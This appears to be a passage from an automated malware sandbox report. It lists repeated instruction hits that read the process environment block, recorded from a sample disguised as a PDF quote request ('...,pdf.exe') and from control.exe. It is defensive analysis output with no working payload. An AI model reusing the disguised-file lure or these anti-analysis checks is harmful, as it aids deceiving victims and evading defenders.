Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h] 2_2_009D3D34
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h] 2_2_009D3D34
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h] 2_2_009D3D34
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h] 2_2_009D3D34
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h] 2_2_009D3D34
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h] 2_2_009D3D34
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h] 2_2_009D3D34
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009CAD30 mov eax, dword ptr fs:[00000030h] 2_2_009CAD30
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009E7D50 mov eax, dword ptr fs:[00000030h] 2_2_009E7D50
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A03D43 mov eax, dword ptr fs:[00000030h] 2_2_00A03D43
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A43540 mov eax, dword ptr fs:[00000030h] 2_2_00A43540
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A73D40 mov eax, dword ptr fs:[00000030h] 2_2_00A73D40
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009EC577 mov eax, dword ptr fs:[00000030h] 2_2_009EC577
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009EC577 mov eax, dword ptr fs:[00000030h] 2_2_009EC577
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A446A7 mov eax, dword ptr fs:[00000030h] 2_2_00A446A7
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A90EA5 mov eax, dword ptr fs:[00000030h] 2_2_00A90EA5
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A90EA5 mov eax, dword ptr fs:[00000030h] 2_2_00A90EA5
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A90EA5 mov eax, dword ptr fs:[00000030h] 2_2_00A90EA5
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A5FE87 mov eax, dword ptr fs:[00000030h] 2_2_00A5FE87
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009F36CC mov eax, dword ptr fs:[00000030h] 2_2_009F36CC
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A7FEC0 mov eax, dword ptr fs:[00000030h] 2_2_00A7FEC0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A08EC7 mov eax, dword ptr fs:[00000030h] 2_2_00A08EC7
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009F16E0 mov ecx, dword ptr fs:[00000030h] 2_2_009F16E0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A98ED6 mov eax, dword ptr fs:[00000030h] 2_2_00A98ED6
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009D76E2 mov eax, dword ptr fs:[00000030h] 2_2_009D76E2
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009FA61C mov eax, dword ptr fs:[00000030h] 2_2_009FA61C
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009FA61C mov eax, dword ptr fs:[00000030h] 2_2_009FA61C
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A7FE3F mov eax, dword ptr fs:[00000030h] 2_2_00A7FE3F
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009CC600 mov eax, dword ptr fs:[00000030h] 2_2_009CC600
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009CC600 mov eax, dword ptr fs:[00000030h] 2_2_009CC600
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009CC600 mov eax, dword ptr fs:[00000030h] 2_2_009CC600
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009F8E00 mov eax, dword ptr fs:[00000030h] 2_2_009F8E00
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A81608 mov eax, dword ptr fs:[00000030h] 2_2_00A81608
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009CE620 mov eax, dword ptr fs:[00000030h] 2_2_009CE620
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009D7E41 mov eax, dword ptr fs:[00000030h] 2_2_009D7E41
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009D7E41 mov eax, dword ptr fs:[00000030h] 2_2_009D7E41
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009D7E41 mov eax, dword ptr fs:[00000030h] 2_2_009D7E41
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009D7E41 mov eax, dword ptr fs:[00000030h] 2_2_009D7E41
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009D7E41 mov eax, dword ptr fs:[00000030h] 2_2_009D7E41
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009D7E41 mov eax, dword ptr fs:[00000030h] 2_2_009D7E41
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A8AE44 mov eax, dword ptr fs:[00000030h] 2_2_00A8AE44
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A8AE44 mov eax, dword ptr fs:[00000030h] 2_2_00A8AE44
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009EAE73 mov eax, dword ptr fs:[00000030h] 2_2_009EAE73
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009EAE73 mov eax, dword ptr fs:[00000030h] 2_2_009EAE73
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009EAE73 mov eax, dword ptr fs:[00000030h] 2_2_009EAE73
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009EAE73 mov eax, dword ptr fs:[00000030h] 2_2_009EAE73
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009EAE73 mov eax, dword ptr fs:[00000030h] 2_2_009EAE73
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009D766D mov eax, dword ptr fs:[00000030h] 2_2_009D766D
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009D8794 mov eax, dword ptr fs:[00000030h] 2_2_009D8794
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A47794 mov eax, dword ptr fs:[00000030h] 2_2_00A47794
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A47794 mov eax, dword ptr fs:[00000030h] 2_2_00A47794
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A47794 mov eax, dword ptr fs:[00000030h] 2_2_00A47794
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A037F5 mov eax, dword ptr fs:[00000030h] 2_2_00A037F5
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009EF716 mov eax, dword ptr fs:[00000030h] 2_2_009EF716
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009FA70E mov eax, dword ptr fs:[00000030h] 2_2_009FA70E
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009FA70E mov eax, dword ptr fs:[00000030h] 2_2_009FA70E
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A9070D mov eax, dword ptr fs:[00000030h] 2_2_00A9070D
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A9070D mov eax, dword ptr fs:[00000030h] 2_2_00A9070D
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009FE730 mov eax, dword ptr fs:[00000030h] 2_2_009FE730
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009C4F2E mov eax, dword ptr fs:[00000030h] 2_2_009C4F2E
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009C4F2E mov eax, dword ptr fs:[00000030h] 2_2_009C4F2E
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A5FF10 mov eax, dword ptr fs:[00000030h] 2_2_00A5FF10
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A5FF10 mov eax, dword ptr fs:[00000030h] 2_2_00A5FF10
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A98F6A mov eax, dword ptr fs:[00000030h] 2_2_00A98F6A
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009DEF40 mov eax, dword ptr fs:[00000030h] 2_2_009DEF40
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009DFF60 mov eax, dword ptr fs:[00000030h] 2_2_009DFF60
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047B746D mov eax, dword ptr fs:[00000030h] 7_2_047B746D
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047CA44B mov eax, dword ptr fs:[00000030h] 7_2_047CA44B
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04868CD6 mov eax, dword ptr fs:[00000030h] 7_2_04868CD6
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047CBC2C mov eax, dword ptr fs:[00000030h] 7_2_047CBC2C
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04816CF0 mov eax, dword ptr fs:[00000030h] 7_2_04816CF0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04816CF0 mov eax, dword ptr fs:[00000030h] 7_2_04816CF0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04816CF0 mov eax, dword ptr fs:[00000030h] 7_2_04816CF0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_048514FB mov eax, dword ptr fs:[00000030h] 7_2_048514FB
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h] 7_2_04851C06
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h] 7_2_04851C06
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h] 7_2_04851C06
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h] 7_2_04851C06
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h] 7_2_04851C06
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h] 7_2_04851C06
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h] 7_2_04851C06
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h] 7_2_04851C06
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h] 7_2_04851C06
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h] 7_2_04851C06
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h] 7_2_04851C06
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h] 7_2_04851C06
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h] 7_2_04851C06
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h] 7_2_04851C06
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0486740D mov eax, dword ptr fs:[00000030h] 7_2_0486740D
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0486740D mov eax, dword ptr fs:[00000030h] 7_2_0486740D
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0486740D mov eax, dword ptr fs:[00000030h] 7_2_0486740D
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04816C0A mov eax, dword ptr fs:[00000030h] 7_2_04816C0A
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04816C0A mov eax, dword ptr fs:[00000030h] 7_2_04816C0A
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04816C0A mov eax, dword ptr fs:[00000030h] 7_2_04816C0A
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04816C0A mov eax, dword ptr fs:[00000030h] 7_2_04816C0A
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0482C450 mov eax, dword ptr fs:[00000030h] 7_2_0482C450
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0482C450 mov eax, dword ptr fs:[00000030h] 7_2_0482C450
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047A849B mov eax, dword ptr fs:[00000030h] 7_2_047A849B
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047BC577 mov eax, dword ptr fs:[00000030h] 7_2_047BC577
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047BC577 mov eax, dword ptr fs:[00000030h] 7_2_047BC577
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_048605AC mov eax, dword ptr fs:[00000030h] 7_2_048605AC
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_048605AC mov eax, dword ptr fs:[00000030h] 7_2_048605AC
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047B7D50 mov eax, dword ptr fs:[00000030h] 7_2_047B7D50
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D3D43 mov eax, dword ptr fs:[00000030h] 7_2_047D3D43
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C4D3B mov eax, dword ptr fs:[00000030h] 7_2_047C4D3B
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C4D3B mov eax, dword ptr fs:[00000030h] 7_2_047C4D3B
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C4D3B mov eax, dword ptr fs:[00000030h] 7_2_047C4D3B
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04816DC9 mov eax, dword ptr fs:[00000030h] 7_2_04816DC9
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04816DC9 mov eax, dword ptr fs:[00000030h] 7_2_04816DC9
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04816DC9 mov eax, dword ptr fs:[00000030h] 7_2_04816DC9
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04816DC9 mov ecx, dword ptr fs:[00000030h] 7_2_04816DC9
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04816DC9 mov eax, dword ptr fs:[00000030h] 7_2_04816DC9
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04816DC9 mov eax, dword ptr fs:[00000030h] 7_2_04816DC9
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0479AD30 mov eax, dword ptr fs:[00000030h] 7_2_0479AD30
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h] 7_2_047A3D34
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h] 7_2_047A3D34
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h] 7_2_047A3D34
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h] 7_2_047A3D34
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h] 7_2_047A3D34
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h] 7_2_047A3D34
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h] 7_2_047A3D34
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h] 7_2_047A3D34
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h] 7_2_047A3D34
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h] 7_2_047A3D34
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h] 7_2_047A3D34
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h] 7_2_047A3D34
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h] 7_2_047A3D34
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0485FDE2 mov eax, dword ptr fs:[00000030h] 7_2_0485FDE2
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0485FDE2 mov eax, dword ptr fs:[00000030h] 7_2_0485FDE2
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0485FDE2 mov eax, dword ptr fs:[00000030h] 7_2_0485FDE2
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0485FDE2 mov eax, dword ptr fs:[00000030h] 7_2_0485FDE2
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04848DF1 mov eax, dword ptr fs:[00000030h] 7_2_04848DF1
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047AD5E0 mov eax, dword ptr fs:[00000030h] 7_2_047AD5E0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047AD5E0 mov eax, dword ptr fs:[00000030h] 7_2_047AD5E0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04868D34 mov eax, dword ptr fs:[00000030h] 7_2_04868D34
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0481A537 mov eax, dword ptr fs:[00000030h] 7_2_0481A537
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0485E539 mov eax, dword ptr fs:[00000030h] 7_2_0485E539
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04813540 mov eax, dword ptr fs:[00000030h] 7_2_04813540
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C1DB5 mov eax, dword ptr fs:[00000030h] 7_2_047C1DB5
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C1DB5 mov eax, dword ptr fs:[00000030h] 7_2_047C1DB5
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C1DB5 mov eax, dword ptr fs:[00000030h] 7_2_047C1DB5
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C35A1 mov eax, dword ptr fs:[00000030h] 7_2_047C35A1
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047CFD9B mov eax, dword ptr fs:[00000030h] 7_2_047CFD9B
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047CFD9B mov eax, dword ptr fs:[00000030h] 7_2_047CFD9B
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04792D8A mov eax, dword ptr fs:[00000030h] 7_2_04792D8A
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04792D8A mov eax, dword ptr fs:[00000030h] 7_2_04792D8A
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04792D8A mov eax, dword ptr fs:[00000030h] 7_2_04792D8A
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04792D8A mov eax, dword ptr fs:[00000030h] 7_2_04792D8A
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04792D8A mov eax, dword ptr fs:[00000030h] 7_2_04792D8A
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C2581 mov eax, dword ptr fs:[00000030h] 7_2_047C2581
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C2581 mov eax, dword ptr fs:[00000030h] 7_2_047C2581
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C2581 mov eax, dword ptr fs:[00000030h] 7_2_047C2581
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C2581 mov eax, dword ptr fs:[00000030h] 7_2_047C2581
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0482FE87 mov eax, dword ptr fs:[00000030h] 7_2_0482FE87
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047BAE73 mov eax, dword ptr fs:[00000030h] 7_2_047BAE73
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047BAE73 mov eax, dword ptr fs:[00000030h] 7_2_047BAE73
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047BAE73 mov eax, dword ptr fs:[00000030h] 7_2_047BAE73
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047BAE73 mov eax, dword ptr fs:[00000030h] 7_2_047BAE73
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047BAE73 mov eax, dword ptr fs:[00000030h] 7_2_047BAE73
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047A766D mov eax, dword ptr fs:[00000030h] 7_2_047A766D
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04860EA5 mov eax, dword ptr fs:[00000030h] 7_2_04860EA5
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04860EA5 mov eax, dword ptr fs:[00000030h] 7_2_04860EA5
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04860EA5 mov eax, dword ptr fs:[00000030h] 7_2_04860EA5
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_048146A7 mov eax, dword ptr fs:[00000030h] 7_2_048146A7
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047A7E41 mov eax, dword ptr fs:[00000030h] 7_2_047A7E41
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047A7E41 mov eax, dword ptr fs:[00000030h] 7_2_047A7E41
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047A7E41 mov eax, dword ptr fs:[00000030h] 7_2_047A7E41
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047A7E41 mov eax, dword ptr fs:[00000030h] 7_2_047A7E41
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047A7E41 mov eax, dword ptr fs:[00000030h] 7_2_047A7E41
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047A7E41 mov eax, dword ptr fs:[00000030h] 7_2_047A7E41
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0484FEC0 mov eax, dword ptr fs:[00000030h] 7_2_0484FEC0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04868ED6 mov eax, dword ptr fs:[00000030h] 7_2_04868ED6
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0479E620 mov eax, dword ptr fs:[00000030h] 7_2_0479E620
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047CA61C mov eax, dword ptr fs:[00000030h] 7_2_047CA61C
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047CA61C mov eax, dword ptr fs:[00000030h] 7_2_047CA61C
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0479C600 mov eax, dword ptr fs:[00000030h] 7_2_0479C600
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0479C600 mov eax, dword ptr fs:[00000030h] 7_2_0479C600
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0479C600 mov eax, dword ptr fs:[00000030h] 7_2_0479C600
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C8E00 mov eax, dword ptr fs:[00000030h] 7_2_047C8E00
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04851608 mov eax, dword ptr fs:[00000030h] 7_2_04851608
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047A76E2 mov eax, dword ptr fs:[00000030h] 7_2_047A76E2
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C16E0 mov ecx, dword ptr fs:[00000030h] 7_2_047C16E0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C36CC mov eax, dword ptr fs:[00000030h] 7_2_047C36CC
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D8EC7 mov eax, dword ptr fs:[00000030h] 7_2_047D8EC7
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0484FE3F mov eax, dword ptr fs:[00000030h] 7_2_0484FE3F
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0485AE44 mov eax, dword ptr fs:[00000030h] 7_2_0485AE44
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0485AE44 mov eax, dword ptr fs:[00000030h] 7_2_0485AE44
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04817794 mov eax, dword ptr fs:[00000030h] 7_2_04817794
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04817794 mov eax, dword ptr fs:[00000030h] 7_2_04817794
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04817794 mov eax, dword ptr fs:[00000030h] 7_2_04817794
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047AFF60 mov eax, dword ptr fs:[00000030h] 7_2_047AFF60
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047AEF40 mov eax, dword ptr fs:[00000030h] 7_2_047AEF40
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047CE730 mov eax, dword ptr fs:[00000030h] 7_2_047CE730
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04794F2E mov eax, dword ptr fs:[00000030h] 7_2_04794F2E
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04794F2E mov eax, dword ptr fs:[00000030h] 7_2_04794F2E
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047BF716 mov eax, dword ptr fs:[00000030h] 7_2_047BF716
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047CA70E mov eax, dword ptr fs:[00000030h] 7_2_047CA70E
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047CA70E mov eax, dword ptr fs:[00000030h] 7_2_047CA70E
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D37F5 mov eax, dword ptr fs:[00000030h] 7_2_047D37F5
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0486070D mov eax, dword ptr fs:[00000030h] 7_2_0486070D
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0486070D mov eax, dword ptr fs:[00000030h] 7_2_0486070D
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0482FF10 mov eax, dword ptr fs:[00000030h] 7_2_0482FF10
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0482FF10 mov eax, dword ptr fs:[00000030h] 7_2_0482FF10
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04868F6A mov eax, dword ptr fs:[00000030h] 7_2_04868F6A
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047A8794 mov eax, dword ptr fs:[00000030h] 7_2_047A8794
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04813884 mov eax, dword ptr fs:[00000030h] 7_2_04813884
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04813884 mov eax, dword ptr fs:[00000030h] 7_2_04813884
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047B0050 mov eax, dword ptr fs:[00000030h] 7_2_047B0050
